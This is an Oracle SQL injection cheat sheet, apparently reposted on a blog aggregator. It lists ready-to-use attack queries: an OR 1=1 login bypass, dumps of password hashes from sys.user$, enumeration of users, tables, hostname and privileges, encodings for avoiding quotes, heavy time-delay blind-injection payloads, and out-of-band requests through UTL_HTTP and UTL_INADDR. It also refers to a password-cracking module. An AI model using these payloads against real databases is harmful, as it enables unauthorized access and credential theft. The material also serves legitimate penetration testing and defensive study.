Oracle
Default Databases
SYSTEM |
Available in all versions |
SYSAUX |
Available in all versions |
The following can be used to comment out the rest of the query after your injection:
Example:
- SELECT * FROM Users WHERE username = ‘‘ OR 1=1 --‘ AND password = ‘‘;
Testing Version
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%‘; |
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%‘; |
SELECT version FROM v$instance; |
Notes:
- All SELECT statements in Oracle must contain a table.
dual
is a dummy table which can be used for testing.
Database Credentials
SELECT username FROM all_users; |
Available on all versions |
SELECT name, password from sys.user$; |
Privileged, <= 10g |
SELECT name, spare4 from sys.user$; |
Privileged, <= 11g |
Database Names
Current Database
SELECT name FROM v$database; |
SELECT instance_name FROM v$instance |
SELECT global_name FROM global_name |
SELECT SYS.DATABASE_NAME FROM DUAL |
User Databases
SELECT DISTINCT owner FROM all_tables; |
Server Hostname
SELECT host_name FROM v$instance; (Privileged) |
SELECT UTL_INADDR.get_host_name FROM dual; |
SELECT UTL_INADDR.get_host_name(‘10.0.0.1‘) FROM dual; |
SELECT UTL_INADDR.get_host_address FROM dual; |
Tables and Columns
Retrieving Tables
SELECT table_name FROM all_tables; |
Retrieving Columns
SELECT column_name FROM all_tab_columns; |
Find Tables from Column Name
SELECT column_name FROM all_tab_columns WHERE table_name = ‘Users‘; |
Find Columns From Table Name
SELECT table_name FROM all_tab_tables WHERE column_name = ‘password‘; |
Retrieving Multiple Tables at once
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ‘,‘)).EXTRACT(‘//text()‘).EXTRACT(‘//text()‘) ,‘,‘) FROM all_tables; |
Avoiding the use of quotations
Unlike other RDBMS, Oracle allows table/column names to be encoded.
SELECT 0x09120911091 FROM dual; |
Hex Encoding. |
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; |
CHR() Function. |
String Concatenation
SELECT ‘a‘||‘d‘||‘mi‘||‘n‘ FROM dual; |
Conditional Statements
SELECT CASE WHEN 1=1 THEN ‘true‘ ELSE ‘false‘ END FROM dual |
Timing
Time Delay
SELECT UTL_INADDR.get_host_address(‘non-existant-domain.com‘) FROM dual; |
Heavy Time Delays
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1)); |
Privileges
SELECT privilege FROM session_privs; |
SELECT grantee, granted_role FROM dba_role_privs; (Privileged) |
Out Of Band Channeling
DNS Requests
SELECT UTL_HTTP.REQUEST(‘http://localhost‘) FROM dual; |
SELECT UTL_INADDR.get_host_address(‘localhost.com‘) FROM dual; |
Password Cracking
A Metasploit module for JTR can be found here.
SQL Injection 字典 - Oracle,古老的榕树,5-wow.com